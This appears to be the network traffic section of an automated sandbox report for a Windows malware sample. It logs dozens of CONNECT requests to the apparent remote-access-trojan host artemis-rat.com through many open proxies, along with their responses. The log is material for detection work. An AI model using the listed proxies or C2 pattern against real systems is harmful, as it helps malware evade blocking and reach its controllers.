                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              765192.168.2.45192464.227.108.25319087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.161673069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              766192.168.2.452407177.135.83.24456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.183427095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              767192.168.2.451437222.179.155.9090917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.200736046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.635638952 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              768192.168.2.452338117.160.250.138807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.200834036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.629322052 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              769192.168.2.4524673.123.150.19231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.201241970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.505456924 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              770192.168.2.452017117.160.250.13188997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.201244116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.569580078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.067491055 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              771192.168.2.452452120.78.191.225807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.201499939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.531194925 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              772192.168.2.452408103.200.135.22941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.201586008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              773192.168.2.452480211.222.252.187807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.222999096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.526118040 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              774192.168.2.452475110.12.211.140807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.228063107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              775192.168.2.45249018.228.198.164807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.240988016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.568248987 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:20.641516924 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 af 65 47 dc 69 bb 72 7b f7 87 59 17 9e 69 ff 99 65 3f 8a 92 ff b3 ce e4 2f c2 4b 3c 9c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: eeGir{Yie?/K<*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:20.970202923 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 86 57 5b 44 68 6e c4 25 59 17 49 06 7b 2b fa 54 8d 5f 09 5a 56 c2 55 2d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9W[Dhn%YI{+T_ZVU-DOWNGRD0000*H010Uartemis-rat.com0240311065443Z260311065443Z010Uartemis-rat.com0"0*H0s24
                                              Mar 11, 2024 08:37:20.972352982 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 10 3d b2 a6 b1 ab a3 30 b1 20 b5 fa d5 18 a3 1b 3b 2a 13 b6 6a 69 bc b6 f7 58 09 13 39 13 0f 32 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ca df 75 5b ce f5 94 74 fe 2a b7 44 d5 7e 03 43 4b 74 76 c8 03
                                              Data Ascii: %! =0 ;*jiX92(u[t*D~CKtvjeB(}
                                              Mar 11, 2024 08:37:21.298376083 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 4b 10 4e e6 8e 0b 9f e1 ac df 65 8f 4f e3 e0 d7 74 05 65 06 89 22 5c 13 18 a8 b4 20 d3 60 d8 05 36 8c 28 87 67 4a 5f fa
                                              Data Ascii: (KNeOte"\ `6(gJ_


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              776192.168.2.452510221.231.13.19810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.282740116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              777192.168.2.44993345.117.179.179359427284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.283992052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366513014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.366545916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366843939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              778192.168.2.45246634.84.95.18980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.294656992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.279119015 CET34INHTTP/1.1 503 Service Unavailable


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              779192.168.2.44995831.44.82.2380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.321693897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.882617950 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              780192.168.2.452518202.29.220.202615077284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.326229095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              781192.168.2.452526211.222.252.18781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.327600002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              782192.168.2.45245443.231.22.228807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.333183050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              783192.168.2.452530116.203.28.43807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.333616972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.653228998 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              784192.168.2.452523111.90.150.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.428569078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              785192.168.2.45252545.233.2.141537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.429148912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              786192.168.2.452522103.23.100.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.429764032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              787192.168.2.45252731.170.22.12710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.429812908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              788192.168.2.45252447.236.252.2188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.430951118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              789192.168.2.45249838.54.116.981187284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.441808939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.860213041 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              790192.168.2.452547114.132.202.24680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.441823959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.992247105 CET84INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              791192.168.2.45242158.253.210.12288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.458750010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              792192.168.2.45255343.155.165.196156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.459754944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
